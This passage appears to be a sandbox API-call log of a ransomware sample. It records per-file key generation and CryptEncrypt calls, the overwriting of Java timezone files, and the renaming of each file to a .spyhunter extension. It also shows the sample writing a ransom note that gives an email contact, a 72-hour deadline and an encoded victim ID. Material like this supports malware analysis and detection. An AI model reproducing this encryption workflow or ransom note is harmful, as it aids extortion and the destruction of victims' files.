hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e610*=0x30) returned 1 [0169.658] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.658] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman") returned 54 [0169.658] StrStrW (lpFirst="Amman", lpSrch=".txt") returned 0x0 [0169.658] GetProcessHeap () returned 0x2c0000 [0169.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.658] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e5d4*=0x40c, lpOverlapped=0x0) returned 1 [0169.660] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.660] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x40c, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e5d4*=0x40c, lpOverlapped=0x0) returned 1 [0169.660] GetProcessHeap () returned 0x2c0000 [0169.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.660] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.660] WriteFile (in: hFile=0xb0, lpBuffer=0x270e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x270e614*, lpNumberOfBytesWritten=0x270e5d4*=0x4, lpOverlapped=0x0) returned 1 [0169.660] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5d4*=0x30, lpOverlapped=0x0) returned 1 [0169.660] CloseHandle (hObject=0xb0) returned 1 [0169.660] GetProcessHeap () returned 0x2c0000 [0169.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.660] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.spyhunter") returned 64 [0169.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Amman.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\amman.spyhunter")) returned 1 [0169.661] GetProcessHeap () returned 0x2c0000 [0169.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.661] GetProcessHeap () returned 0x2c0000 [0169.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.661] GetProcessHeap () returned 0x2c0000 [0169.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f26960 | out: hHeap=0x2c0000) returned 1 [0169.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e618 | out: pbBuffer=0x270e618) returned 1 [0169.662] GetProcessHeap () returned 0x2c0000 [0169.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e610*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e610*=0x30) returned 1 [0169.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.662] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty") returned 55 [0169.662] StrStrW (lpFirst="Almaty", lpSrch=".txt") returned 0x0 [0169.662] GetProcessHeap () returned 0x2c0000 [0169.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.662] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e5d4*=0x1c5, lpOverlapped=0x0) returned 1 [0169.663] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.663] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1c5, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e5d4*=0x1c5, lpOverlapped=0x0) returned 1 [0169.663] GetProcessHeap () returned 0x2c0000 [0169.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.664] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.664] WriteFile (in: hFile=0xb0, lpBuffer=0x270e614*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x270e614*, lpNumberOfBytesWritten=0x270e5d4*=0x4, lpOverlapped=0x0) returned 1 [0169.664] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5d4*=0x30, lpOverlapped=0x0) returned 1 [0169.664] CloseHandle (hObject=0xb0) returned 1 [0169.664] GetProcessHeap () returned 0x2c0000 [0169.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.664] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.spyhunter") returned 65 [0169.664] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Almaty.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\almaty.spyhunter")) returned 1 [0169.665] GetProcessHeap () returned 0x2c0000 [0169.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.665] GetProcessHeap () returned 0x2c0000 [0169.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.665] GetProcessHeap () returned 0x2c0000 [0169.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f268a8 | out: hHeap=0x2c0000) returned 1 [0169.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e610 | out: pbBuffer=0x270e610) returned 1 [0169.665] GetProcessHeap () returned 0x2c0000 [0169.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e608*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e608*=0x30) returned 1 [0169.665] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.666] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden") returned 53 [0169.666] StrStrW (lpFirst="Aden", lpSrch=".txt") returned 0x0 [0169.666] GetProcessHeap () returned 0x2c0000 [0169.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.666] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.667] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.667] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e5cc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e5cc*=0x41, lpOverlapped=0x0) returned 1 [0169.667] GetProcessHeap () returned 0x2c0000 [0169.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.667] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.667] WriteFile (in: hFile=0xb0, lpBuffer=0x270e60c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5cc, lpOverlapped=0x0 | out: lpBuffer=0x270e60c*, lpNumberOfBytesWritten=0x270e5cc*=0x4, lpOverlapped=0x0) returned 1 [0169.667] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5cc*=0x30, lpOverlapped=0x0) returned 1 [0169.667] CloseHandle (hObject=0xb0) returned 1 [0169.667] GetProcessHeap () returned 0x2c0000 [0169.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.667] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.spyhunter") returned 63 [0169.667] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aden.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aden.spyhunter")) returned 1 [0169.668] GetProcessHeap () returned 0x2c0000 [0169.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.668] GetProcessHeap () returned 0x2c0000 [0169.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.668] GetProcessHeap () returned 0x2c0000 [0169.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f267f0 | out: hHeap=0x2c0000) returned 1 [0169.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.671] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0169.671] WriteFile (in: hFile=0xb0, lpBuffer=0x270e543*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x270e543*, lpNumberOfBytesWritten=0x270e66c*=0x127, lpOverlapped=0x0) returned 1 [0169.671] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0169.671] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e66c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e66c*=0x2ac, lpOverlapped=0x0) returned 1 [0169.672] CloseHandle (hObject=0xb0) returned 1 [0169.672] GetProcessHeap () returned 0x2c0000 [0169.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7d980 | out: hHeap=0x2c0000) returned 1 [0169.672] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e608 | out: pbBuffer=0x270e608) returned 1 [0169.672] GetProcessHeap () returned 0x2c0000 [0169.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.672] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e600*=0x30) returned 1 [0169.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.672] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok") returned 61 [0169.672] StrStrW (lpFirst="Vostok", lpSrch=".txt") returned 0x0 [0169.672] GetProcessHeap () returned 0x2c0000 [0169.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.673] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.673] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.673] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.673] GetProcessHeap () returned 0x2c0000 [0169.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.674] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.674] WriteFile (in: hFile=0xb0, lpBuffer=0x270e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x270e604*, lpNumberOfBytesWritten=0x270e5c4*=0x4, lpOverlapped=0x0) returned 1 [0169.674] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5c4*=0x30, lpOverlapped=0x0) returned 1 [0169.674] CloseHandle (hObject=0xb0) returned 1 [0169.674] GetProcessHeap () returned 0x2c0000 [0169.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.674] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.spyhunter") returned 71 [0169.674] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Vostok.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\vostok.spyhunter")) returned 1 [0169.675] GetProcessHeap () returned 0x2c0000 [0169.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.675] GetProcessHeap () returned 0x2c0000 [0169.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.675] GetProcessHeap () returned 0x2c0000 [0169.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebac00 | out: hHeap=0x2c0000) returned 1 [0169.675] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e608 | out: pbBuffer=0x270e608) returned 1 [0169.675] GetProcessHeap () returned 0x2c0000 [0169.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e600*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e600*=0x30) returned 1 [0169.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.679] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa") returned 60 [0169.679] StrStrW (lpFirst="Syowa", lpSrch=".txt") returned 0x0 [0169.679] GetProcessHeap () returned 0x2c0000 [0169.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.679] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.680] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.680] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5c4*=0x41, lpOverlapped=0x0) returned 1 [0169.681] GetProcessHeap () returned 0x2c0000 [0169.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.681] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.681] WriteFile (in: hFile=0xa0, lpBuffer=0x270e604*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x270e604*, lpNumberOfBytesWritten=0x270e5c4*=0x4, lpOverlapped=0x0) returned 1 [0169.681] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5c4*=0x30, lpOverlapped=0x0) returned 1 [0169.681] CloseHandle (hObject=0xa0) returned 1 [0169.681] GetProcessHeap () returned 0x2c0000 [0169.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.681] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.spyhunter") returned 70 [0169.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Syowa.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\syowa.spyhunter")) returned 1 [0169.682] GetProcessHeap () returned 0x2c0000 [0169.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.682] GetProcessHeap () returned 0x2c0000 [0169.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.682] GetProcessHeap () returned 0x2c0000 [0169.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebab38 | out: hHeap=0x2c0000) returned 1 [0169.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e600 | out: pbBuffer=0x270e600) returned 1 [0169.682] GetProcessHeap () returned 0x2c0000 [0169.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5f8*=0x30) returned 1 [0169.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0169.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer") returned 61 [0169.683] StrStrW (lpFirst="Palmer", lpSrch=".txt") returned 0x0 [0169.683] GetProcessHeap () returned 0x2c0000 [0169.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.683] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e5bc*=0x450, lpOverlapped=0x0) returned 1 [0169.752] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.752] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e5bc*=0x450, lpOverlapped=0x0) returned 1 [0169.752] GetProcessHeap () returned 0x2c0000 [0169.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.752] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.752] WriteFile (in: hFile=0xa0, lpBuffer=0x270e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x270e5fc*, lpNumberOfBytesWritten=0x270e5bc*=0x4, lpOverlapped=0x0) returned 1 [0169.752] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5bc*=0x30, lpOverlapped=0x0) returned 1 [0169.753] CloseHandle (hObject=0xa0) returned 1 [0169.792] GetProcessHeap () returned 0x2c0000 [0169.792] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.792] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.spyhunter") returned 71 [0169.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Antarctica\\Palmer.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\antarctica\\palmer.spyhunter")) returned 1 [0169.793] GetProcessHeap () returned 0x2c0000 [0169.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 